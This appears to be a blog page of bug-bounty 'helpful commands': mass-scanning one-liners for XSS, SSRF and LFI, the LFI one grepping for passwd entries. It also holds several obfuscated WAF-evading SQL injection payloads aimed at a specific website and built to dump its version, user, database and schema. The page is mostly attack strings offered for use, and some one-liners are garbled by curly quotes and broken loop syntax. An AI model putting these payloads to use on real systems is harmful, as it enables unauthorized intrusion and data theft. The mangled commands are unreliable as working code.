Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

SQLi-5 Solution

SQLi Solution

SQLi Solution

http://bwcrank(.)com/Download.php?cid=.10 and@x:=(concat/**_**/((conv(1654995359940503,10,36)),0x3c62723e,0x3c62723e,((/*!50000%53eleCt/**_**/*/+(/*!50000variable_value/**_**/*/)/*!50000from/**_**/*/+/*!50000i%6e%66orMATion_sCHEma.gLOBal_vARIables/**_**/*/+/*!50000where/**_**/*/+/*!50000variable_name/**_**/*/=0x76657273696f6e) ),(/*!50000%53eleCt/**_**/*/(@x)froM(/*!50000%53eleCt/**_**/*/(@x:=0x00),(/*!50000%53eleCt/**_**/*/(0)From(/*!50000information_schema.columns/**_**/*/)where(table_schema=database/**_**/())and(0x00)in(@x:=concat/**_**/(@x,0x3c6c693e,table_name,0x203a3a20,column_name))))x) )) /*!12345%55nioN/**_**/*/ /*!50000%53eleCT/**_**/*/ conCAT/**_**/(0x222f3e,0x3c2f6469763e,0x3c62723e,0x3c666f6e7420636f6c6f723d77686974653e,0x3c62723e,(conv(1654995359940503,10,36)),0x3c62723e,0x3c62723e,0x64617461626173653a3a,schema/**_**/(),0x3c62723e,0x757365723a3a,user/**_**/(),0x3c62723e,0x76657273696f6e3a3a,(/*!50000%53eleCt/**_**/*/+variable_value /*!50000from/**_**/*/+/*!50000i%6e%66orMATion_sCHEma.gLOBal_vARIables/**_**/*/+where variable_name=0x76657273696f6e),@x,0x3c2f666f6e743e)%23 . . http://bwcrank(.)com/Download.php?page=1&cid=10 /*!UnIoN/*DR V*/*/ /*!select/*DR V*/*/1111,CONCAT(0x3c6c693e,CONCAT(CHAR(68),0x52,0b00101110,CHAR(32,32),conv(31,10,36)),0x3c62723e,0x56657273696f6e3a3a20,(Select+variable_value+from+information_schema.global_variables+where+variable_name=0x76657273696f6e),0x3c62723e,0x4461746162617365203a3a20,schema(),0x3c62723e,0x55736572203a3a20,CURRENT_USER/**8**/(),0x3c6c693e3c6c693e3c6c693e3c6c693e,(select+reverse(insert(0x1,1,0,reverse(concat%0B(unhex(hex(group_concat(0x3c6c693e,``0.e.Table_name,0x2e,``0.e.Column_name))),0x3c62723e)))) From {f information_schema 0.e.columns} where table_schema=database%0B())),3333,4444,5555,6666,7777,8888-- . . http://bwcrank(.)com/Download.php?cid=10 div @a:=concat(%30%78%33%63%32%66%36%31%33%65%33%63%32%66%36%63%36%39%33%65,%30%78%33%63%36%32%37%32%33%65%33%63%36%32%37%32%33%65,%30%78%36%31%36%35%33%30%36%65%35%66%36%36%36%63%37%35%37%38,%30%78%33%63%36%32%37%32%33%65,%30%78%35%36%36%35%37%32%37%33%36%39%36%66%36%65%32%30%33%61%33%61%32%30,version(),%30%78%33%63%36%32%37%32%33%65,%30%78%35%35%37%33%36%35%37%32%32%30%33%61%33%61 ,user(),%30%78%33%63%36%32%37%32%33%65,%30%78%34%34%36%31%37%34%36%31%36%32%36%31%37%33%36%35%32%30%33%61%33%61%32%30,database(),%30%78%33%63%36%32%37%32%33%65%33%63%36%32%37%32%33%65,(select group_concat(table_name,0x203a3a20,column_name,0x3c62723e) from information_schema.columns where table_schema=database/*!50000(*/))) /*!50000Union/**/*//*!50000Select/**/*/ 1,@a,333,4444,5,6,7,8 --+- .

Comments

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C